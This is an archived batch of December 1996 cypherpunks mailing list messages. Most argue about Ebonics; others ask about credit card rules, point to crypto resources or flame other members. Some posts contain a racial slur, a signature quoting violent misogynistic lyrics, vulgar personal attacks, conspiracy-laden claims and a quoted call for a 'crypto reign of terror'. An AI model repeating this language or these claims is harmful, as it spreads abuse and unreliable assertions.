Date: Sun, 22 Dec 1996 12:40:14 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <199612222048.PAA10229@isis.osiris.com>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe jld@osiris.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Gurski <mgursk1@umbc.edu>
Date: Sun, 22 Dec 1996 12:43:42 -0800 (PST)
To: cypherpunks list <cypherpunks@toad.com>
Subject: Legality of requiring credit cards?
Message-ID: <Pine.OS2.3.95.961222151556.7261A-100000@klinzhai.nanticoke.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

It's that wonderful season again, when all the assholes are out in
force, and people feel obligated to purchase merchandise to give to
each other.  For various reasons, I don't believe in credit cards, and
yet, trying to pay for something by personal check at the local
Hecht's, they either *require* a credit card, or go through the Nazi
check-warranty company Equifax.  However, it doesn't stop there...only
SOME departments seem to have this requirement (Electronics/Luggage
not requiring).  Is it legal to require credit cards?

|\/|ike Gurski  mgursk1@umbc.edu  http://www.gl.umbc.edu/~mgursk1/
finger/mail subject "send pgpkey"|"send index"  Hail Eris! -><-  O- |Member,
1024/39B5BADD PGP Keyprint=3493 A994 B159 48B7 1757 1E4E 6256 4570  |   Team
My opinions are mine alone, even if you should be sharing them.     |   OS/2
	    Senate Finance Committee Chair, SGA 1996-1997

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: I am not a number, I am a free man!

iQCVAwUBMr2dZiKEMrE5tbrdAQGNEwQAjxsj387SAbEQnGr+8j0z12cWpREK/Y8U
e5xCYMMwJ6J+rLip05nZ8uMHfY/anfGW5m2mMrvsVOggMh5Sv9Ljrw3u4uFl66B5
yU3iU3couXIZx5Dv1QhGdOSZPRpIo7wZGwCGtF4z9TM+cUzEUzA8LMDgavG8fY0D
T+yrGuzhSzg=
=aQ97
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Sun, 22 Dec 1996 14:14:51 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Ebonics
Message-ID: <199612222159.QAA10214@mercury.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


	I would like to conclude this Ebonics issue. The main problem is
understanding. Some people have bad accents, either Southern or Ebonic,
both of which are often difficult to understand. I am not disputing the
fact that everyone should learn a standard language, but I object to the
racial undertones of the messages - that black people are stupider than
white people, and gross ignorance of environmental conditions. Whatever.

Mark Rosen
FireSoft - http://www.geocities.com/SiliconValley/Pines/2690
Mark Eats AOL - http://www.geocities.com/TimesSquare/6660




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jlucas4@capital.edu (Jesse Lucas)
Date: Sun, 22 Dec 1996 13:00:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: the word is "NIGGAZ"
Message-ID: <9612222057.AA14301@monoceros.capital.edu>
MIME-Version: 1.0
Content-Type: text/plain



   Actually the word is "niggus."  "Niggaz" is the white man's nasal rendition 
of this term.  It can alos be spelt "niggas," but this form implies a different context. 
context.  "Niggus" is used often within gangsta rap music in an effort to 
rhyme with difficult words when no other way can be found.  "Niggas" would be 
referring to other black fellows in a friendly way.  

   More or less.  


			Gangsta J

**************************************************************************
# Gangsta J              # "Dead bodies pile up, an' it's plain to see,  #
# j@hardcore.gangsta.com #  it's because o' me.  I'm the girl killa, the #
# Brownsville ghetto     #  throat slitta, the cunt rippa" - J           #
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Sun, 22 Dec 1996 14:19:29 -0800 (PST)
To: Jamie Lawrence <foodie@netcom.com>
Subject: Re: Ebonics
Message-ID: <3.0.32.19961222161832.006c01fc@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 05:04 PM 12/21/96 -0800, Jamie Lawrence wrote:
>Are you honestly arguing that a system of communication
>acknoledged and taught in a public school is satisfying
>a 'need or desire to communicate in a private way"?

Actually I meant my tongue to be relatively firmly in cheek.  However, some
sub-cultures from which ebonics comes did have a need and desire to
communicate quickly and privately.

>Or that Ebonics has anything to do with communicating
>in the presence of a police officer?

Often times in some areas of this country, people distrust the police.
They do form ways of communication that is not easily understood to avoid
what they see as police interference.  I am not defending use of
communication privacy techniques in the name of the four-horsemen but...

>
>Or that either of the above has anything to do with crypto?
>

As Tim and others have said repeatedly, there is no on/off topic here.
Want pure code goto coderpunks; want moderation goto cryptography.  I am
just trying to counter some of the statements made here.  Sometimes people
view cpunks as some sort of borg-like mind with no dissidents.  I sometimes
reply to let people know that might not be so...

Matt

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCUAwUBMr2ztLpijqL8wiT1AQFZHAP43SqA3CGpt46zs8esSYNPvw3Iyf/No2y6
7yQ1ij2UN/jD2rFh8CPJE+MS59YOlXiItsBDQLZoGJRhWS/dVJ8LHkeMvZHwHD1l
Yf01COkpB6K7HMj0pFjVvdpigbekWzGrTh5juIRg/xhkLhUqJJfN5eWlgif29Fnd
EzgHGGBBQA==
=QyMm
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 22 Dec 1996 16:30:20 -0800 (PST)
To: "Mark Rosen" <mrosen@peganet.com>
Subject: Re: Ebonics
Message-ID: <199612230030.QAA18048@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:30 PM 12/22/96 -0500, Mark Rosen wrote:
>	Hehe. What I mean to say is that since both Ebonics and a Southern accent
>are learned during early childhood, you have no control over how you talk.

This is not true.  The recent commentary and interviews I've seen on this 
subject make it clear that the people speaking "Ebonics" are quite capable 
of speaking in standard English, and do so when they find it, er, convenient.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Sun, 22 Dec 1996 14:30:07 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Ebonics
Message-ID: <3.0.32.19961222162859.006c01fc@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Sorry to quote so much, in this case it seemed necessary.

At 04:07 PM 12/21/96 -0800, Timothy C. May wrote:
>At 5:49 PM -0600 12/21/96, Matthew J. Miszewski wrote:
>
>>Are you talking about the School Board requirements?  Are you still in High
>>School, Tim? ;-)  I have never heard you speak of children, so you might
>>have a valid complaint if you have them in public schools (although home
>>schooling is still an option).
>
>The principle is of interest to even those without schoolaged children!
>Neither having schoolaged children nor living in the Oakland Public School
>System district is a necessary condition for commenting on the foolishness
>of "Ebonics" and other such scams. Only the most naive of commentators says
>things like "If your children were not cannibalized by Jeffrey Dahmer, why
>do you feel the need to comment on Dahmer?"
>
>(Sorry, Matthew, but I'm losing any remaining respect for your rhetorical
>skills. I used to think we just disagreed politically, now I see more is
>involved.)

I apparently need to use those twirpy smiley faces more often (see above).
I meant that to be funny which I guess it wasnt.  

One of your (Tim) prior posts clarifies much.  That you hold out absolutely
no hope for democracy actually lets me in on why you express yourself now
like you do. My memory is that you werent always so clear in your
expressions of disgust; this memory comes from several non-derogatory uses
of the term "suits" when it came to cpunk political action in the past.  I
agree that democracy has myriads of flaws, but still hold out some hope for
change.

My comment about such inflaming language was of disappointment because Tim
almost single-handedly helped me reconsider many of my traditional
political thoughts.  It is difficult sometimes to get past the anger in
current posts (although I do understand and respect Tim's ability to be
absolutely honest about his views which is refreshing.)

Matt

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMr22JbpijqL8wiT1AQHbIQQAhX7pj5JqkG55pWkexxn5qRMmlhme44lo
ZsHXsfVNWhon2gqPBUvQT7BDEXJvTiiPGcfaAYL5GZV5FqpDOnuvyEBUOWwCoajK
oFBHTgHeLL90MRi+py+k5rtofz5wA68M9LDqnNlIsISeTeq9vefBbGmeNIq3mrnv
d/eqocuU1aM=
=A/LN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Sun, 22 Dec 1996 14:49:23 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Ebonics
Message-ID: <3.0.32.19961222164822.006c01fc@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


>You're confusing issues. As with similar confusions about "right to work"
>(where the putative conflict is between Alice's right to hire whom she
>chooses and Bob's putative "right to a job"), the confusion lies in what
>one calls a right.

I assume you are talking about right-to-work labor laws, in which case, it
does not refer to the above.  It has to do with union-membership (which you
more than likely similarly disagree with...)

I agree that there is rampant abuse of the word/idea of "rights" in this
country and around the world.  I similarly think that many political
disagreements can be boiled down to this problem.

>And just where did anyone in any of these posts call for outlawing any
>particular language, pidgin, slang, creole, jive, or invented lingo?

I was actually joking, Tim.  My original response was sent before I knew of
the Oakland initiative.  I do not hail from California, the land of
Proposition XXX, and find some of them silly.  

You do advocate the unemployment of people who do utilize such a
dialect/language.  And I do fear that many people subscribe to your line of
thinking.  So I do respond to some of your posts earlier than I sometimes
should to present a different point of view.

>Really, Matt, go back to Rhetoric 101 and learn how to argue.

That's a good argument.  Do they teach that ad hominem stuff in that class?
;-)  

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Sun, 22 Dec 1996 14:57:43 -0800 (PST)
To: "Mark M." <markm@voicenet.com>
Subject: Re: Ebonics
Message-ID: <3.0.32.19961222165645.006c01fc@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08:30 PM 12/21/96 -0500, Mark M. wrote:
>I never said that the government should force people to speak a certain
>language.  You are missing the main point: How do you expect to communicate
>with an employee who can't speak any language that you can understand?  It's
>not arbitrary at all.  In fact, it's rather simple.

I have apparently been excrutiatingly unclear in my last post (tired folks
should stay away from their terminals).  I wasnt refrencing governmental
action, but rather a flaw in some principles.  I believe that the line of
thought that we should all speak "proper" english leads to anti-libertarian
results.  What has been missing from my posts is the link to the chain of
english-as-an-official-language regulation.  

Tim's argument for the ability to communicate is somewhat reasonable in an
employment context (although it depends largely upon the employment).  When
it is couched in the terms of his post, it makes the link to the chain of
reasoning above much easier to make. 

Matt

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMr28prpijqL8wiT1AQH70AP/TV7qcy3y26yeH+eNvm9MVBY0NfuBGokC
uHS1NxpiIxl6NUTXIZTHKjlOd/pGM8JBgV6fp+7o+iruiJWBhE6mql+d/NAWjDiz
RLJ8brwuy0sqG98GrwCKHjsc6Bf88v+DcxHxAs92uEqJ6aKeEuqXiITFwKrC9xjf
euZxnLm0q6w=
=OEgE
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sun, 22 Dec 1996 17:08:30 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Slaughter
Message-ID: <3.0.32.19961222165943.006b21a8@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:12 AM 12/22/96 -0800, Dale Thorn wrote:
>Carl Johnson wrote:
>> Dale Thorn wrote:
>
>> Thanks, I love the quote but can't find it or it's source.  Perhaps I
>> can put it all together in bits and pieces.
>
>As long as we're getting closer on that one, I thought I'd add my own
>twist on another famous (but obnoxious) quote:
>
>The standard version:
>God grant me the serenity to accept the things I cannot change;
>The courage to change the things I can;
>And the wisdom to know the difference.  (quote not necessarily exact).
>
>My version:
>God grant me the wisdom to know the difference between right and wrong;
>The courage to support those who I feel are doing the right things,
> and to oppose those who are doing the wrong things;
>And the serenity to do so as peacefully as possible.

Another, increasingly popular, variety of the AA "prayer" is:
God grant me the serenity to accept the things I cannot change;
The courage to change the things I can;
And the firepower that makes the difference.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://www.mersenne.org/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vin McLellan <vin@shore.net>
Date: Sun, 22 Dec 1996 15:04:11 -0800 (PST)
To: SHARK <otaner@boun.edu.tr>
Subject: Re: Encryption ?
In-Reply-To: <Pine.A32.3.91.961219132500.5946D-100000@hamlin.cc.boun.edu.tr>
Message-ID: <32BDBE40.6B4B@shore.net>
MIME-Version: 1.0
Content-Type: text/plain


Shark <otaner@boun.edu.tr> wrote:
 
> I am a Mathematic student at Bosphorus University in Turkey.
> I am interested in both computer applications and mathematical base of
> encryption.Where can I find this kind of staff on internet.

> Is it necessary to have high level of mathematical background in order to
> deal with encryption??

	No, you do not need a phd or the like to deal with the fundamental
issues of access and implementation in cryptography, nor to appreciate
the elegant logical structures of cryptographic protocols and designs.  

	Yes, you do need sophisticated math skills to, say, evaluate the
relative strength of cryptographic algorithms and protocols -- but few
have those skills... and many more of us, nonetheless, have to make
decisions. So we rely on the opinions of those we come to trust in these
esoteric matters. 

	I highly recommend two Finnish websites: 

	<http://www.modeemi.cs.tut.fi/~avs/eu-crypto.html> and 
	<http://www.cs.hut.fi/ssh/crypto> 

	(AVS, at the first, has a great selection of pre-set web-searches which
can refocus your query into categories which are particularly relevant
to Europeans and non-Americans.)  There are also treasure-laden FTP
sites in Holland <ftp://utopia.hacktic.nl/pub/replay/pub/> and the UK:
<ftp://ftp.ox.ac.uk/pub/crypto/> among many valuable international
sites. 

	If your bent is toward applied crypto, see the COAST archive at:
<http://www.cs.purdue.edu/coast/coast.html> You might also want to visit
the SDTI/RSA website <http://www.rsa.com> for their FAQ and archive, and
the Quadralay site <http://www.austinlinks.com/crypto/) where, among the
C'punk references, you'll find the sci.crypto FAQ.  

	A websearch (e.g.
<http://www.yahoo.com/Computers_and_Internet/Security_and_Encryption/Cryptography/>) 
will retrieve, among other treasures, a number of "introductions to
cryptography" for beginners and others.  When you narrow your interests,
look for FAQs (frequently asked queston) files on a specific topic: for
example, SSL, or SMIME, or S-HTTP)

	As you've doubtless noticed, the Internet as a whole is painfully
US-centric (and some inhabitants of little virtual villages like C'punks
are often so enamored with their own self-image that they refuse to be
distracted by anything else;-) C'punks desperately needs someone with
the wit of Nasser Hodin Hodja -- but I also think you caught a couple of
guys on a "bad hair day" or something. Folks here are generally more
responsive to people jumping the language and cross-cultural barriers. 

	The Net as a whole is very open. There is a great willingness to share,
help, and respond; even with "newbie" inquiries.  Experts in the field
regularly step in to nudge a discussion and, sometimes, even restate the
basics.  You'll do better if you do a little work one your own, and
_then_ reach out and ask for further clarification or additional
pointers.

	Görü sürüz,
			_Vin
-- 
         Vin McLellan +The Privacy Guild+ <vin@shore.net> 
      53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                         <*><*><*><*><*><*><*><*><*>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 22 Dec 1996 16:21:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Ebolics Virus may be contained
In-Reply-To: <v03007800aee340007037@[207.167.93.63]>
Message-ID: <cm5cZD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy C. May <tcmay@got.net> farted:
> By the way, I'll be off the list for a while, for the usual seasonal
> reasaons. Ignore the usual Vulis remarks about how my silence means he has
> succeeded in driving me off the list, or that I'm in a tryst with Gilmore
> and Hughes.

A romantic threesome?

Anyway, good riddance.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 22 Dec 1996 16:20:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <Pine.OS2.3.95.961222151556.7261A-100000@klinzhai.nanticoke.net>
Message-ID: <1o5cZD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael Gurski <mgursk1@umbc.edu> writes:
> It's that wonderful season again, when all the assholes are out in
> force, and people feel obligated to purchase merchandise to give to
> each other.

So don't. It's another idiotic American custom that I don't follow.

>              For various reasons, I don't believe in credit cards, and
> yet, trying to pay for something by personal check at the local
> Hecht's, they either *require* a credit card, or go through the Nazi
> check-warranty company Equifax.  However, it doesn't stop there...only
> SOME departments seem to have this requirement (Electronics/Luggage
> not requiring).  Is it legal to require credit cards?

They're welcome not to accept checks if they don't want to.
Why should the gubmint tell anyone whether it's "legal" to reject
checks from potential crooks? "Cypher punks" and "libertarian"
are such fucking statists. If you don't want to use a credit card,
pay cash.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 22 Dec 1996 19:06:11 -0800 (PST)
To: Alec <camcc@abraxis.com>
Subject: Re: Language (Was:Re: Ebonics)
In-Reply-To: <3.0.32.19961222121921.006a2b84@smtp1.abraxis.com>
Message-ID: <32BDF6D5.3D16@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Alec wrote:
> :If you read my complete post, you would note that I made a distinction
> :between "twang" (i.e., slurring words)
> Twang is _not_ slurring words; twang is speaking with a nasal accent. A
> good example is the principal's secretary in "Ferris Buhler's Day Off."

This is very interesting.  I've seen and heard examples that show
Yankee dialect to be more nasal, and you're saying twang is nasal.
Must be a Yankee trying to sound "twangy". BTW, the "accents" in a
lot of Hollywood movies are really atrocious to native ears.

P.S. A person whose name I forgot wrote a book called "Southern by
the Grace of God", in which he tells of going to New York and really
enjoying hearing native accents in Brooklyn, etc.  He explains that
since Big Media is trying so desperately (examples available) to wipe
out native accents/dialects, speech is becoming rather bland all over,
and he found the local accents in N.Y. to be a refreshing change from
the bland stuff, even though his personal preference was Southern.
Oklahoma, as I recall.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 22 Dec 1996 19:09:07 -0800 (PST)
To: Asgaard <asgaard@Cor.sos.sll.se>
Subject: Re: The Ebolics Virus may be contained
In-Reply-To: <Pine.HPP.3.91.961223010146.174A-100000@cor.sos.sll.se>
Message-ID: <32BDF779.2846@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Asgaard wrote:
> On Sun, 22 Dec 1996, Timothy C. May wrote:
> > By the way, both Jesse Jackson and famed poetess Maya Angelou have
> > denounced the Oakland School Board's adoption of "Ebonics" as shameful
> > and a travesty. Jackson said black children should not be encouraged to
> > speak "garbage."

If I remember correctly, the head of the NAACP a few years ago said
(in response to having to say 7 syllables instead of 1, i.e., African-
American instead of Black), "we were better off when it was just plain
Colored".  (Quote approximate).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 22 Dec 1996 19:32:53 -0800 (PST)
To: marc@cygnus.com>
Subject: Re: [NOT NOISE] Microsoft Crypto Service Provider API
Message-ID: <199612230332.TAA29587@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:36 AM 12/18/96 -0800, geeman@best.com wrote:
>
>Microsoft had to agree to validate crypto binaries against
>a signature to make sure they weren't tampered with, in 
>exchange for shipping crypto-with-a-hole.  They will
>sign anything (theoretically) if it has the export
>papers and all.  Or without, if you affadavit it is not
>for export.
>
>They do not themselves impose any restrictions on crypto
>strength.
>I'm not expressing political position here, just conveying facts ....

What if the software involved was IMPORTED?  Moreover, is legal to export 
just the signature?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 22 Dec 1996 18:20:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Off topic litter on Cyperpunks
In-Reply-To: <3.0.32.19961222141617.006999b0@mail.tcbi.com>
Message-ID: <XT0cZD13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Lurker" <lurker@mail.tcbi.com> writes:

> What has happened to cypherpunks?  I joined this mailing list more recently
> than many others who recieve it, but most reacently it has gone downhill.
>
> The descriptions I have read (and I have read many) all state that this
> list is deadicated to the discussion of cryptography issues.  Where the
> hell is the discussion about cryptography?

This private mailing list belongs to the asshole censor John Gilmore (spit).
Anyone who foolishly tries to discuss cryptography (like Don Woods) gets flamed
to hell by the likes of Paul "brute force attack one one-time pad" Bradley.
You wanna talk cryptography, go to sci.crypt, an unmoderated Usenet newsgroup.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 22 Dec 1996 18:21:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Untraceable Payments, Extortion, and Other Bad Things
In-Reply-To: <v03007801aee25b84a198@[207.167.93.63]>
Message-ID: <c80cZD16w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


See what jerk tcmay(fart) is: he sends crypto discussions to the "cypher
punks" mailing list, where crypto is off-topic now.

"Timothy C. May" <tcmay@got.net> writes:
> I've noticed a few references in the press, and maybe on this list, to the
> idea that because some bad things may be done with untraceable payments
> (true Chaumian digicash, not the watered down version offering only
> one-sided untraceability), that governments will "not allow" such
> untraceable payments.

Fuck the gubmint. Fuck the patent law. Patent law, copyright law, libel
law - none of that shit has any relevance in the cyberspace. Do I understand
right that David Chaum no longer runs ecash? Then I see no ethical reason
not to implement his original ideas with full anonymity *NOW*.

...
> "Untraceable payments" refer to payer- and payee-untraceable Chaum-style
> cash. Although for the discussions here of extortion, payee-untraceable
> (the person being paid would not be traceable is my sense of this term)
> digital cash would be sufficient; that the payment originated from XYZ
> Corporation or some account at the Bank of Albania would not stop the acts.
>
> Chaum has in recent years attempted (I have to presume) to take the "edge"
> of fully-intraceable digital cash by making it only partly untraceable.
> Many of us hypothesized that "mixes" (as in remailers) could be used to
> fully-untraceabalize (?) even partly-traceable systems. I recall Lucky
> Green, Hal Finney, and others in such discussions. "Banks" were proposed to
> do this. Recently, Ian Goldberg claims to have a system which formally
> accomplishes this.

So instead of shooting your stupid mouth, issue some ecash and promise to
exchange it for real US$ upon bearer's demand. Do you have the balls for it?

> Suppose there exists a supplier of fully-untraceable (or payee-untraceable
> at least) cash *somewhere* in the world. It could be a physical bank, a la
> the Bank of Albania, or it could be an underground payment system, a la the
> Mafia, the Tongs, the Triads, whatever. A reputation-reliant system which
> says "Present us with the proper set of numbers and we will provide money
> to the bearer, or follow instructions, and so on." (I'm informally
> describing the process of "redeeming" a digital bearer instrument,
> converting the set of numbers into some other form of specie, or item of
> value, whatever. Maybe gold, maybe dollars, maybe an entry into an account
> somewhere. The "untraceability," via the blinding operation, means that the
> bearer is not linked to the transaction made earlier, so there is not risk
> at the bank or Triad. I'm also not distinguishing between offline and
> online clearing here...my feeling for a long time has been that online
> clearing has many advantages, but I suspect it does not work too well in
> the extortion case described here, until something like PipeNet can be used
> as part of the process.)

Translation: you don't have the balls to do this yourself.

See, "cypher punks" can only while and flame, and they don't have the
guts to issue ecash and to say: this token will be exchanged for $1 by
Lucky Green; and that token will be exchanged for $10 by Hall Filly.

> This is why I look forward to this Brave New World of fully untraceable
> communications and fully untraceable economic transactions.

But you don't have the balls to bring it any closer, you airbag parasite.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 22 Dec 1996 18:30:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <3.0.32.19961222161832.006c01fc@mail.execpc.com>
Message-ID: <ywaDZD18w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Matthew J. Miszewski" <mjmiski@execpc.com> writes:
> just trying to counter some of the statements made here.  Sometimes people
> view cpunks as some sort of borg-like mind with no dissidents.

"Cypher punks" is a private mailing list owned by the asshole censor John
Gilmore who unsubscribes whoever dares post something John doesn't like.

His mailing list is a laughing stock for the media.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Bugden <70023.3247@compuserve.com>
Date: Sun, 22 Dec 1996 18:50:39 -0800 (PST)
To: "'blanc'" <blancw@cnw.com>
Subject: RE: The Ebonic Plague
Message-ID: <961223024816_70023.3247_CHU91-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


blancw@cnw.com wrote:
>From: Timothy C. May
>
>Democracy has run amok in this country. There is no hope for reforming
>at the ballot box, as democracy only makes things worse. Only a crypto
>reign of terror can purge this land of the scum.
>......................................................
>
>Just how would this take shape in "real life" - what would constitute this 
>reign of terror; how do you envision such an event in action?
>
>And which are the scum who would be purged?
>
>Blanc

Scum - you know - it's like crap - it's the stuff that floats to the top. 

Or is that the cream?

Sucks Syntax!
Anarchy Rules! 
Merry Christmas!

James
jbugden@alis.com

"pride and selfishness, when combined with mental power, never want for a theory
to justify them-and when men oppress their fellow-men, the oppressor ever finds,
in the character of the oppressed, a full justification for his oppression."
Frederick Douglass, 1854






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 22 Dec 1996 21:57:40 -0800 (PST)
To: Lurker <lurker@mail.tcbi.com>
Subject: Re: Off topic litter on Cyperpunks
In-Reply-To: <3.0.32.19961222141617.006999b0@mail.tcbi.com>
Message-ID: <32BE1EF6.3A57@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Lurker wrote:
> What has happened to cypherpunks?  I joined this mailing list more recently
> than many others who recieve it, but most reacently it has gone downhill.
> The descriptions I have read (and I have read many) all state that this
> list is deadicated to the discussion of cryptography issues.  Where the
> hell is the discussion about cryptography?
> Three fourths of the messages I have been recieving are off topic (Ebonics
> and "Slaughter").  If I wanted to read about current events and holocost I
> would have joined groups that were specified for discussion of those.

Now Lurker, you can go read a discussion of Indo-European culture or
South American sheep grazing on any news group, and if the info posted
there doesn't conflict with any current government interests such as
restricting crypto, then sure, the discussion will be plain and out in
the open for all to see (and who cares anyway, right?).

But you didn't really expect to come here and just get handed the most
interesting technical data on a subject that *does* concern the NSA et
al rather deeply, and not have to do any work?  It's there, but it's
going to take patience and some reading between the lines.  Consider
yourself lucky that you can suscribe to such a list as this, while
such a freedom still exists.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 22 Dec 1996 22:13:27 -0800 (PST)
To: Mark Rosen <mrosen@peganet.com>
Subject: Re: Ebonics
In-Reply-To: <199612222158.QAA10206@mercury.peganet.com>
Message-ID: <32BE22B0.584B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Mark Rosen wrote:
> > Just saying someone has a Southern "accent" is prejudicial and ignorant.
> > It's true that anyone, Southern or otherwise, can slur words so they're
> > not clear, but on averages, Southerners who speak clearly with their
> > native inflections and pronunciations are easier to understand than your
> > typical Yankees, whose speech is generally thin, nasal and rather
> > pinched-sounding.

> Yeah. But I can't understand people with Southern Accents therefore I
> won't hire them.

Then let me speak a language that you, Mark Rosen, can understand:

Oswald did it alone.  George Lincoln Rockwell really *didn't* run all
of his new prospects through the FBI.  Sirhan Sirhan worked alone.
Money grows on trees.  And best of all, in the immortal words of
Noam (asshole) Chomsky: "I can see *no* forces who would have
wanted Kennedy dead".  (And not a single y'all in the bunch).

> > People talked about hate in the South in the 1960's.  What a crock.
> > Apartheid, sure, no doubt about that.  But hate, well, I grew up in
> > the North and I lived for a few years in the deep South, and the people
> > in the South don't hate like the Yankees do, on average.

> Wow. You must read completely different history books than the rest of
> the world.

Not the rest of the world, Mark.  People outside of the U.S. are pretty
hip.  It's guys like you who promote the popular ignorance here.  Did
you know, Mark, that many of the top important people of the world got
together outside of Toronto a few months ago for their annual meeting
of world-importance discussions, and the American press thought it was
not worth reporting on?  The Canadian press reported on it.  Maybe those
Canadians just don't have any respect for privacy, or maybe they are all
stupid, or (gag!) maybe they are all in cahoots with that nefarious
Neo-Nazi Willis Carto!!

> > If you want to see how hate works, look how the big-media organizations
> > have descended on Southern radio and TV and have been telling them that
> > they speak wrongly, and that Southern "accents" are something to be
> > ashamed of.

> Damn the liberal media! (That was a sarcastic statement - do you know how
> right-wing that sounds).

Gosh, Mark.  All we really need to go on here in the U.S. is our first
impressions of things.  No need to be suspicious about government maybe
wanting to *rule* us or anything like that, no need to worry that guys
like John J. McCloy, Henry Ford, and the Rockefellers would even *think*
to use the Nurnberg trials as a (gasp!) spy laundry, where the number
executed was what, 5 or 10?  Sleep well, Mark.  Nothing to be concerned
about.  Everything you read in the papers is true!

P.S. You'll note above I was describing actual experience, which you
